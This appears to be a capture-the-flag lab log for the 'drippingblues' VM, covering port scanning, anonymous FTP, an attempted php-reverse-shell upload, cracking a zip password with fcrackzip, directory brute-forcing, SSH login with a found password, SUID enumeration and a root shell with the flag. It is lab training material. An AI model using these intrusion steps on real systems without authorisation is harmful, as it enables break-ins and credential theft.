Kal ddddx ~ ❯ export ip=192.168.108.141                                                                    at 20:42:05
Kal ddddx ~ ❯ rustscan -a $ip                                                                              at 20:43:42
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/ddddx/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.108.141:22
Open 192.168.108.141:21
Open 192.168.108.141:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-22 20:43 CST
Initiating ARP Ping Scan at 20:43
Scanning 192.168.108.141 [1 port]
Completed ARP Ping Scan at 20:43, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:43
Completed Parallel DNS resolution of 1 host. at 20:43, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:43
Scanning 192.168.108.141 [3 ports]
Discovered open port 22/tcp on 192.168.108.141
Discovered open port 80/tcp on 192.168.108.141
Discovered open port 21/tcp on 192.168.108.141
Completed SYN Stealth Scan at 20:43, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.108.141
Host is up, received arp-response (0.0019s latency).
Scanned at 2025-06-22 20:43:46 CST for 0s

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 00:0C:29:57:2B:64 (VMware)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

ftp> cd /tmp
550 Failed to change directory.
ftp> ls
229 Entering Extended Passive Mode (|||23003|)
150 Here comes the directory listing.
-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip
226 Directory send OK.
ftp> get respectmydrip.zip
local: respectmydrip.zip remote: respectmydrip.zip
229 Entering Extended Passive Mode (|||26196|)
150 Opening BINARY mode data connection for respectmydrip.zip (471 bytes).
100% |**************************************************************************|   471      241.57 KiB/s    00:00 ETA
226 Transfer complete.
471 bytes received in 00:00 (208.50 KiB/s)
ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||16562|)
550 Permission denied.

Kal ddddx ~ ❯ unzip respectmydrip.zip                                                                      at 20:52:09
Archive:  respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password:
kal ddddx ~ ❯ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt respectmydrip.zip            took 2m 17s at 20:54:46

PASSWORD FOUND!!!!: pw == 072528035
Kal ddddx ~/blues ❯ unzip respectmydrip.zip                                                                at 21:04:18
Archive:  respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password:
 extracting: respectmydrip.txt
  inflating: secret.zip
Kal ddddx ~/blues ❯ ls                                                                             took 5s at 21:04:26
respectmydrip.txt  respectmydrip.zip  secret.zip
Kal ddddx ~/blues ❯ cat respectmydrip.txt                                                                  at 21:04:28
just focus on "drip"
Kal ddddx ~/blues ❯ unzip secret.zip                                                                       at 21:04:34
Archive:  secret.zip
[secret.zip] secret.txt password:
password incorrect--reenter:
password incorrect--reenter:
   skipping: secret.txt              incorrect password

Kal ddddx ~/blues ❯ dirsearch -u http://192.168.108.141/ -w /usr/share/wordlists/dirb/common.txt           at 21:09:48
/home/ddddx/tools/dirsearch/lib/core/installation.py:24: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 4613

Target: http://192.168.108.141/

[21:12:20] Scanning:
[21:12:23] 200 -   138B - /index.php
[21:12:24] 200 -    78B - /robots.txt
[21:12:24] 403 -   280B - /server-status

hello dear hacker wannabe,
你好，亲爱的黑客爱好者，

go for this lyrics:去这句歌词：

https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html

count the n words and put them side by side then md5sum it
数 n 个单词并将它们并排放置，然后 md5sum 它

ie, hellohellohellohello >> md5sum hellohellohellohello
即 hellohellohellohello >> md5sum hellohellohello

it's the password of ssh
这是 SSH 的密码

password is:
imdrippinbiatch

thugger@drippingblues:~$ whoami
thugger
thugger@drippingblues:~$ id
uid=1001(thugger) gid=1001(thugger) groups=1001(thugger)
thugger@drippingblues:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
thugger@drippingblues:~$ find / -perm -4000 -type f 2>/dev/null
/snap/snapd/12883/usr/lib/snapd/snap-confine
/snap/snapd/7264/usr/lib/snapd/snap-confine
/snap/core18/1705/bin/mount
/snap/core18/1705/bin/ping
/snap/core18/1705/bin/su
/snap/core18/1705/bin/umount
/snap/core18/1705/usr/bin/chfn
/snap/core18/1705/usr/bin/chsh
/snap/core18/1705/usr/bin/gpasswd
/snap/core18/1705/usr/bin/newgrp
/snap/core18/1705/usr/bin/passwd
/snap/core18/1705/usr/bin/sudo
/snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1705/usr/lib/openssh/ssh-keysign
/snap/core18/2128/bin/mount
/snap/core18/2128/bin/ping
/snap/core18/2128/bin/su
/snap/core18/2128/bin/umount
/snap/core18/2128/usr/bin/chfn
/snap/core18/2128/usr/bin/chsh
/snap/core18/2128/usr/bin/gpasswd
/snap/core18/2128/usr/bin/newgrp
/snap/core18/2128/usr/bin/passwd
/snap/core18/2128/usr/bin/sudo
/snap/core18/2128/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2128/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

root@drippingblues:/home/thugger# cd /root
root@drippingblues:~# ls
root.txt
root@drippingblues:~# cat root.txt
78CE377EF7F10FF0EDCA63DD60EE63B8root@drippingblues:~#